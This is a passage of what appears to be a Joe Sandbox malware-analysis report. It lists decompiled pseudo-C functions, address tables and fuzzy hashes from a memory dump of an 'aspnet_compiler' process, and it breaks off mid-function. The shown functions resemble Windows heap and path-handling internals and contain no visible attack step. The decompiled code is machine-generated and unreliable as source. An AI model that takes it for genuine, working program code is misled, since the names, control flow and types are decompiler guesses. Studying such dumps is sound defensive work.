                                                                                        0x0125aa99
                                                                                        0x0125aaa8
                                                                                        0x0125aaaf
                                                                                        0x0125aab3
                                                                                        0x0125aacc
                                                                                        0x0125aad1
                                                                                        0x0125aad6
                                                                                        0x0125aae0
                                                                                        0x0125aaf3
                                                                                        0x0125aaf9
                                                                                        0x0125aafe
                                                                                        0x0125aafe
                                                                                        0x0125aaf3
                                                                                        0x0125aad6
                                                                                        0x0125aab3
                                                                                        0x0125ab07
                                                                                        0x0125ab0a
                                                                                        0x0125ab11
                                                                                        0x0125ab23
                                                                                        0x0125ab13
                                                                                        0x0125ab1c
                                                                                        0x0125ab1c
                                                                                        0x0125ab2b
                                                                                        0x0125ab44
                                                                                        0x0125ab44
                                                                                        0x0125ab51
                                                                                        0x0125ab51
                                                                                        0x0125aa44
                                                                                        0x0125aa47
                                                                                        0x0125aa4c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0125aa5a
                                                                                        0x0125aa64
                                                                                        0x0125aa72
                                                                                        0x00000000
                                                                                        0x0125aa66
                                                                                        0x0125aa66
                                                                                        0x0125aa68
                                                                                        0x0125aa6a
                                                                                        0x00000000
                                                                                        0x0125aa6a

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                        • Instruction ID: 6640105f5b3f5c1c0a44cb04db0f4b62ceb2236e04cab8ec83eb7daa9446491f
                                                                                        • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                        • Instruction Fuzzy Hash: 88311532F101066BEB558B69C897BBFFBBBEF90210F054569EE00A7281EA70DD00C690
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0125FDE2 Relevance: .1, Instructions: 116COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 76%
                                                                                        			E0125FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0125FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01260A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E011B7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01251608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01262B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0125C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0125DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E011B7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0125A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                                                        0x0125fde7
                                                                                        0x0125fde8
                                                                                        0x0125fdec
                                                                                        0x0125fdee
                                                                                        0x0125fdf5
                                                                                        0x0125fdf7
                                                                                        0x0125fdfc
                                                                                        0x0125fe19
                                                                                        0x0125fe22
                                                                                        0x0125fe26
                                                                                        0x0125fec6
                                                                                        0x0125fecd
                                                                                        0x0125fed5
                                                                                        0x0125fee7
                                                                                        0x0125fed7
                                                                                        0x0125fee0
                                                                                        0x0125fee0
                                                                                        0x0125feef
                                                                                        0x0125ff00
                                                                                        0x0125ff02
                                                                                        0x0125ff07
                                                                                        0x0125ff07
                                                                                        0x00000000
                                                                                        0x0125feef
                                                                                        0x0125fe33
                                                                                        0x0125fe55
                                                                                        0x0125fe59
                                                                                        0x0125fe5b
                                                                                        0x0125fe5e
                                                                                        0x0125fe69
                                                                                        0x0125fe6d
                                                                                        0x0125fe6d
                                                                                        0x0125fe69
                                                                                        0x0125fe35
                                                                                        0x0125fe41
                                                                                        0x0125fe41
                                                                                        0x0125fe79
                                                                                        0x0125fe8b
                                                                                        0x0125fe7b
                                                                                        0x0125fe84
                                                                                        0x0125fe84
                                                                                        0x0125fe93
                                                                                        0x00000000
                                                                                        0x0125fea8
                                                                                        0x0125feba
                                                                                        0x00000000
                                                                                        0x0125feba
                                                                                        0x0125fdfe
                                                                                        0x0125fe01
                                                                                        0x0125fe02
                                                                                        0x0125fe08
                                                                                        0x0125ff0c
                                                                                        0x0125ff14
                                                                                        0x0125ff14

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                        • Instruction ID: b30610ceec9c4159c5f0cc44d093a1f66a79d780e919d1211ae7a3666c963a74
                                                                                        • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                        • Instruction Fuzzy Hash: 293159323206426FD362976CCAC5F7A7BE9EBC5650F084458EE468BB82DB74DC41C760
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0125EA55 Relevance: .1, Instructions: 111COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 70%
                                                                                        			E0125EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E011B2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0125E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0119F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E011AFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0125AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0125BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E011B7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0124FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E011AFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0125A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                                                        0x0125ea55
                                                                                        0x0125ea66
                                                                                        0x0125ea68
                                                                                        0x0125ea6c
                                                                                        0x0125ea6f
                                                                                        0x0125ea72
                                                                                        0x0125ea75
                                                                                        0x0125ea7a
                                                                                        0x0125ea7a
                                                                                        0x0125ea7e
                                                                                        0x0125ea80
                                                                                        0x0125ea85
                                                                                        0x0125ea8b
                                                                                        0x0125eab5
                                                                                        0x0125eabc
                                                                                        0x0125eabf
                                                                                        0x0125eabf
                                                                                        0x0125eaca
                                                                                        0x0125eace
                                                                                        0x0125ead0
                                                                                        0x0125eae4
                                                                                        0x0125eaeb
                                                                                        0x0125eaf0
                                                                                        0x0125eaf5
                                                                                        0x0125eb09
                                                                                        0x0125eb0d
                                                                                        0x0125eb1d
                                                                                        0x0125eb2d
                                                                                        0x0125eb38
                                                                                        0x0125eb3d
                                                                                        0x0125eb41
                                                                                        0x0125eb4a
                                                                                        0x0125eb60
                                                                                        0x0125eb4c
                                                                                        0x0125eb52
                                                                                        0x0125eb59
                                                                                        0x0125eb59
                                                                                        0x0125eb68
                                                                                        0x0125eb71
                                                                                        0x0125eb71
                                                                                        0x0125ea8d
                                                                                        0x0125ea8f
                                                                                        0x0125ea92
                                                                                        0x0125ea97
                                                                                        0x0125ea97
                                                                                        0x0125ea9b
                                                                                        0x0125ea9c
                                                                                        0x0125ea9e
                                                                                        0x0125eaa6
                                                                                        0x0125eaa6
                                                                                        0x0125eb7e

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                        • Instruction ID: 16fb643cfac83a3c08cc8ef5c042025051c71eae1f05a4f077fb0d0a83fc8875
                                                                                        • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                        • Instruction Fuzzy Hash: CB31C3726147069FC719DF28C8C1A6BF7AAFBC0210F05492DFA5687641EB30E905C7A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012169A6 Relevance: .1, Instructions: 108COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 69%
                                                                                        			E012169A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x128d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L011A6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01216BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E011D9980() >= 0) {
							E011B2280(_t56, 0x1288778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1288774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1288774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0119B6F0(0x117c338, 0x117c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E011D9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E011D95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E011AFFB0(_t68, _t77, 0x1288778);
				}
				_pop(_t78);
				return E011DB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                                        0x012169b5
                                                                                        0x012169be
                                                                                        0x012169c3
                                                                                        0x012169c9
                                                                                        0x012169cc
                                                                                        0x012169d1
                                                                                        0x012169d3
                                                                                        0x012169de
                                                                                        0x012169e1
                                                                                        0x012169ea
                                                                                        0x012169f6
                                                                                        0x012169fe
                                                                                        0x01216a13
                                                                                        0x01216a14
                                                                                        0x01216a15
                                                                                        0x01216a16
                                                                                        0x01216a1e
                                                                                        0x01216a26
                                                                                        0x01216a31
                                                                                        0x01216a36
                                                                                        0x01216a37
                                                                                        0x01216a40
                                                                                        0x01216a49
                                                                                        0x01216a4a
                                                                                        0x01216a53
                                                                                        0x01216a59
                                                                                        0x01216a5d
                                                                                        0x01216a5e
                                                                                        0x01216a64
                                                                                        0x01216a67
                                                                                        0x01216a6a
                                                                                        0x01216a6d
                                                                                        0x01216a70
                                                                                        0x01216a77
                                                                                        0x01216a7d
                                                                                        0x01216a86
                                                                                        0x01216a89
                                                                                        0x01216a9c
                                                                                        0x01216a9f
                                                                                        0x01216aa2
                                                                                        0x01216aa5
                                                                                        0x01216aaf
                                                                                        0x01216ab1
                                                                                        0x01216ab8
                                                                                        0x01216ab9
                                                                                        0x01216abb
                                                                                        0x01216abe
                                                                                        0x01216ac5
                                                                                        0x01216ac5
                                                                                        0x01216aaf
                                                                                        0x01216a40
                                                                                        0x01216a26
                                                                                        0x012169fe
                                                                                        0x01216ace
                                                                                        0x01216ad0
                                                                                        0x01216ad3
                                                                                        0x01216ad8
                                                                                        0x01216adf
                                                                                        0x01216adf
                                                                                        0x01216ae8
                                                                                        0x01216aef
                                                                                        0x01216aef
                                                                                        0x01216af9
                                                                                        0x01216b06

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 501d61fe9dfce6098ab7b874808762823c1c9932e11e70f8cd116176f4b606e8
                                                                                        • Instruction ID: 0814743833d60ccfd0020457341bc4fc3256f7b7f75edfd1201fed936fed089a
                                                                                        • Opcode Fuzzy Hash: 501d61fe9dfce6098ab7b874808762823c1c9932e11e70f8cd116176f4b606e8
                                                                                        • Instruction Fuzzy Hash: E5419FB2D0120DAFDB28DFA9D840BFEBBF4EF58718F14812AE914A7240DB749905CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01195210 Relevance: .1, Instructions: 107COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 85%
                                                                                        			E01195210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E011952A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E011D95D0();
							L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E011AEB70(_t54, 0x12879a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E011D95D0();
								L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E011AEB70(_t54, 0x12879a0);
						}
						return _t52;
					}
					L5:
					_t33 = E011DF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E011AEB70(_t54, 0x12879a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E011D95D0();
							L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                                        0x01195220
                                                                                        0x01195224
                                                                                        0x011f0d13
                                                                                        0x011f0d16
                                                                                        0x011f0d19
                                                                                        0x0119522a
                                                                                        0x0119522a
                                                                                        0x0119522d
                                                                                        0x0119522d
                                                                                        0x01195231
                                                                                        0x01195235
                                                                                        0x01195239
                                                                                        0x011f0d5c
                                                                                        0x011f0d62
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f0d6a
                                                                                        0x011f0d7b
                                                                                        0x011f0d7f
                                                                                        0x011f0d81
                                                                                        0x011f0d84
                                                                                        0x011f0d95
                                                                                        0x011f0d95
                                                                                        0x011f0d6c
                                                                                        0x011f0d71
                                                                                        0x011f0d71
                                                                                        0x011f0d9a
                                                                                        0x00000000
                                                                                        0x0119524a
                                                                                        0x0119524a
                                                                                        0x01195250
                                                                                        0x011f0d24
                                                                                        0x011f0d35
                                                                                        0x011f0d39
                                                                                        0x011f0d3b
                                                                                        0x011f0d3e
                                                                                        0x011f0d50
                                                                                        0x011f0d50
                                                                                        0x011f0d26
                                                                                        0x011f0d2b
                                                                                        0x011f0d2b
                                                                                        0x00000000
                                                                                        0x011f0d55
                                                                                        0x01195256
                                                                                        0x0119525b
                                                                                        0x01195265
                                                                                        0x011f0da7
                                                                                        0x0119526b
                                                                                        0x0119526e
                                                                                        0x01195272
                                                                                        0x011f0db1
                                                                                        0x011f0db4
                                                                                        0x011f0dc5
                                                                                        0x011f0dc5
                                                                                        0x01195272
                                                                                        0x01195278
                                                                                        0x0119527e
                                                                                        0x0119528a
                                                                                        0x0119528c
                                                                                        0x0119528d
                                                                                        0x00000000
                                                                                        0x01195280
                                                                                        0x01195282
                                                                                        0x01195288
                                                                                        0x0119529f
                                                                                        0x01195292
                                                                                        0x00000000
                                                                                        0x01195292
                                                                                        0x00000000
                                                                                        0x01195288
                                                                                        0x0119527e

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 38918da003b61dab16b81892189603fab5e0e9dc05b0e1360a1f0236e7cd6f60
                                                                                        • Instruction ID: 89c199f406fc7e17513405941710cea876eb66762b295274b1827a14ecb06e92
                                                                                        • Opcode Fuzzy Hash: 38918da003b61dab16b81892189603fab5e0e9dc05b0e1360a1f0236e7cd6f60
                                                                                        • Instruction Fuzzy Hash: FE312831241601EBCB2EAB18C890B7E7B77FF54764F11466EF6261B1D2DB30E800C691
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D3D43 Relevance: .1, Instructions: 106COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011D3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E011A7B60(0, _t61, 0x11711c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E011A7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L011B4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                                        0x011d3d4c
                                                                                        0x011d3d50
                                                                                        0x011d3d55
                                                                                        0x011d3d5e
                                                                                        0x0120e79a
                                                                                        0x00000000
                                                                                        0x0120e79a
                                                                                        0x011d3d68
                                                                                        0x0120e789
                                                                                        0x011d3d9d
                                                                                        0x011d3da3
                                                                                        0x011d3daf
                                                                                        0x011d3db5
                                                                                        0x011d3dbc
                                                                                        0x011d3dc4
                                                                                        0x011d3dc9
                                                                                        0x011d3dce
                                                                                        0x0120e7ae
                                                                                        0x0120e7ae
                                                                                        0x011d3dde
                                                                                        0x011d3de2
                                                                                        0x011d3de7
                                                                                        0x011d3e0d
                                                                                        0x011d3e13
                                                                                        0x011d3e16
                                                                                        0x011d3e1e
                                                                                        0x011d3e25
                                                                                        0x011d3e28
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011d3e2a
                                                                                        0x011d3e2f
                                                                                        0x011d3e37
                                                                                        0x011d3e37
                                                                                        0x00000000
                                                                                        0x011d3e37
                                                                                        0x011d3e31
                                                                                        0x00000000
                                                                                        0x011d3e31
                                                                                        0x011d3e20
                                                                                        0x011d3e20
                                                                                        0x011d3e35
                                                                                        0x00000000
                                                                                        0x011d3de9
                                                                                        0x011d3de9
                                                                                        0x011d3de9
                                                                                        0x011d3dee
                                                                                        0x011d3dfd
                                                                                        0x011d3dff
                                                                                        0x011d3e02
                                                                                        0x011d3e05
                                                                                        0x011d3e05
                                                                                        0x00000000
                                                                                        0x011d3df0
                                                                                        0x011d3de7
                                                                                        0x0120e78f
                                                                                        0x0120e794
                                                                                        0x011d3d79
                                                                                        0x011d3d84
                                                                                        0x011d3d89
                                                                                        0x011d3d8e
                                                                                        0x00000000
                                                                                        0x0120e7a4
                                                                                        0x011d3d96
                                                                                        0x011d3d9a
                                                                                        0x00000000
                                                                                        0x011d3d9a
                                                                                        0x00000000
                                                                                        0x0120e794
                                                                                        0x011d3d6e
                                                                                        0x011d3d73
                                                                                        0x00000000
                                                                                        0x0120e7b5
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0118b1e72eb049d2c305e10a1f45852c6ddf70cc6c2785ba554cf345a82a7ee2
                                                                                        • Instruction ID: bb53d1aca59519dc08fac7d344efdb45e9f1bbabfc9347dcf0032fcc9ecc7ecf
                                                                                        • Opcode Fuzzy Hash: 0118b1e72eb049d2c305e10a1f45852c6ddf70cc6c2785ba554cf345a82a7ee2
                                                                                        • Instruction Fuzzy Hash: F131D2B2610621DBD72D8F2DC841A7ABBF5FF45700B06846AE555CB3A1E730D840CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011CA61C Relevance: .1, Instructions: 106COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 78%
                                                                                        			E011CA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1270220);
				E011ED08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1287b9c; // 0x0
				_t55 = L011B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
